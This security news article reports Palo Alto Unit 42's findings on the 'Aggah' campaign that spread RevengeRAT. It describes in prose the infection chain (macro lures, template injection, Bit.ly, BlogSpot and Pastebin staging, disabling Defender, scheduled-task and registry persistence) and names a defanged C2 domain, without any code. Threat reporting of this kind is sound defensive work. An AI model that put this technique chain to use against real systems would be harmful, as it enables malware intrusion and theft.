Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT

Palo Alto Networks Unit 42 researchers uncovered a malicious campaign targeting entities in North America, Europe, Asia, and the Middle East with RevengeRAT.

The campaign was carried out during March, threat actors tracked as
Aggah” used pages hosted on Bit.ly, BlogSpot, and Pastebin as a command-and-control (C2) infrastructure to distribute the RevengeRAT.

Attackers hit organizations in several industries including Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, and other Professional business.

“In March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations within a Middle Eastern country.” reads the analysis published by Palo Alto Networks.

“Further analysis revealed that this activity is likely part of a much larger campaign impacting not only that region but also the United States, and throughout Europe and Asia.”

The usage of legitimate services to deliver the malware aims at avoiding detection.

RevengeRAT variants were used by different APT groups, such as The Gorgon Group, that hit entities in the UK, Spain, Russia and in the US. The source code of the RAT has been publicly leaked a few years ago and could be actually part of multiple campaigns conducted by several threat actors. 

RevengeRAT allows to open remote shells on the infected system, manage system files, processes, and services, log keystrokes, edit the Windows Registry, edit the hosts file, dump users passwords, and access the webcam, and many more actions.

Researcher an analyzed a bait document built to load a malicious macro-enabled document from a remote server via Template Injection.

“These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to download additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2.” continues the analysis.

“During our research, we found several related delivery documents that followed the same process to ultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack campaign.”

Once the victims opened the decoy document, it will display a lure image designed to trick them into turning on Microsoft Office macros to “Enable Editing.” If the victim enables the macros, a remote OLE document containing the malicious macro would be loaded using template injection.

The OLE file loaded an embedded Excel document which would download a malicious script from a shortened URL using the Bit.ly service. In a similar way, the malicious code was also downloaded in other attacks from a Blogspot domain hosting a malicious JavaScript.

“The malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft Defender by removing its signature set. The script also kills the Defender process along with the processes for several Office applications.” reads the analysis.

Experts pointed out that the technique of enabling macros and disabling ProtectedView in Office and the tactic of killing processes for Windows Defender and Microsoft Office applications were employed by Gorgon group in past campaigns. 

Once downloaded on a victim’s machine, the script will perform the following main actions:

• Downloading a payload from a Pastebin URL
• Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
• Creating an autorun registry key to obtain and run a script from a Pastebin URL

The last stage malware is downloaded from Pastebin, it is a RevengeRAT variant dubbed “Nuclear Explosion” that uses the lulla.duckdns[.]org domain as C2.

The analysis of a single bit.ly shortened URL revealed it was clicked over 1,900 times by targets from roughly 20 countries, this data could give us an idea of the extent of the campaign.

The analysis of decoy document’s properties allowed the experts to discover a number of other RevengeRAT samples used in this campaign.

Despite this, the Palo Alto Networks researchers conclude that there is no “concrete evidence that this attack campaign is associated with Gorgon.”

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, RevengeRAT)

[adrotate banner=”5″]

[adrotate banner=”13″]